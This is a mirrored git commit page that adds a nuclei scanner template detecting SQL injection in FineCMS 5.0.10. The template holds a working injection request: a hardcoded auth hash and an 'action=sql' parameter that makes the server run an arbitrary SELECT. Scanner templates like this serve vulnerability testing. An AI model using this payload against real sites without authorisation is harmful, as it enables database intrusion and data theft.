daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #4570 from ritikchaddha/patch-76 

Create finecms-sqli.yaml
patch-1
Prince Chaddha 2022-06-15 13:05:47 +05:30 committed by GitHub
parent 87eac39fc7 e743dc5dc0
commit 482525c17a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
vulnerabilities/other/finecms-sqli.yaml Normal file
View File

@ -0,0 +1,22 @@
id: finecms-sqli
info:
name: FineCMS 5.0.10 - SQL Injection
author: ritikchaddha
severity: high
description: |
SQL Injection exists in FineCMS 5.0.10.
reference:
- https://blog.csdn.net/dfdhxb995397/article/details/101385340
tags: finecms,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{randstr}})%27"
matchers:
- type: word
part: header
words:
- '{{md5("{{randstr}}")}}'